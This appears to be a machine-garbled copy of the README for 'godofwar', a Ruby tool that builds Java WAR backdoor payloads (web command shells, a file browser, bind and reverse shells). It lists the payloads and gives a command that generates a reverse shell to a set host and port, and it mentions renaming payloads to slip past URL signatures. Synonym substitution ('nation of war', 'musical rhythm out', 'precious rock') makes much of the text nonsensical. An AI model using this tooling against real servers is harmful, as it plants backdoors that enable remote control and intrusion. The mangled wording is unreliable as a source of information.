Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads


Influenza A virus subtype H5N1 command-line tool to generate nation of war payloads for penetration testing / red teaming purposes, written inwards ruby.
 Features
  • Preexisting payloads. (try -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Configurable backdoor. (try --host/-port)
  • Control over payload name.
    • To avoid malicious cite subsequently deployment to bypass URL cite signatures.

Installation
$ precious rock install godofwar

Usage
$ godofwar -h   Help menu:    -p, --payload PAYLOAD            Generates nation of war from ane of the available payloads.                                         (check -l/--list)    -H, --host IP_ADDR               Local or Remote IP address for the chosen payload                                         (used alongside -p/--payload)    -P, --port PORT                  Local or Remote Port for the chosen payload                                         (used alongside -p/--payload)    -o, --output [FILE]              Output file in addition to the deployment name.                                         (default is the payload original name. depository fiscal establishment jibe '-l/--list')    -l, --list                       listing all available payloads.    -h, --help                       Show this assist message.

Example
List all payloads
$ godofwar -l ├── cmd_get │   └── Information: │       ├── Description: Command execution via spider web interface │       ├── OS:          whatsoever │       ├── Settings:    {"false"=>"No Settings required!"} │       ├── Usage:       http://host/cmd.jsp?cmd=whoami │       ├── References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"] │       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get ├── filebrowser │   └── Information: │       ├── Description: Remote file browser, upload, download, unzip files in addition to native ascendance execution │       ├── OS:          whatsoever │       ├── Settings:    {"false"=>"No Settings required!"} │       ├── Usage:       http://host/filebrowser.jsp │       ├── References:  ["http://www.vonloesch.de/filebrowser.html"] │       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser ├── bind_shell │   └── Information: │       ├── Description: TCP bind musical rhythm out │       ├── OS:          whatsoever │       ├── Settings:    {"port"=>4444, "false"=>"No Settings required!"} │       ├── Usage:       http://host/reverse-shell.jsp │       ├── References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"] │       └   ── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell ├── reverse_shell_ui │   └── Information: │       ├── Description: TCP opposite musical rhythm out alongside a HTML shape to educate LHOST in addition to LPORT from browser. │       ├── OS:          whatsoever │       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"} │       ├── Usage:       http://host/reverse_shell_ui.jsp │       ├── References:  [] │       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui ├── reverse_shell │   └── Information: │       ├── De   scription: TCP opposite shell. LHOST in addition to LPORT are hardcoded │       ├── OS:          whatsoever │       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"} │       ├── Usage:       http://host/reverse_shell.jsp │       ├── References:  [] │       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generate payload alongside LHOST in addition to LPORT
godofwar -p reverse_shell -H 192.168.100.10  -P 9911 -o puppy
After deployment, you lot tin view your musical rhythm out on (http://host:8080/puppy/puppy.jsp)

Contributing
  1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Create your characteristic branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am 'Add to a greater extent than or less feature').
  4. Push to the branch (git force rootage my-new-feature).
  5. Create a novel Pull Request.

Add More Backdoors
To contribute past times adding to a greater extent than backdoors:
  1. create a novel folder nether payloads directory.
  2. put your jsp file nether the newly created directory (make it the same directory name).
  3. update payloads_info.json file with
    1. description.
    2. supported operating organisation (try to larn inwards universal though).
    3. configurations: default host in addition to port.
    4. references: the payload rootage or its creator credits.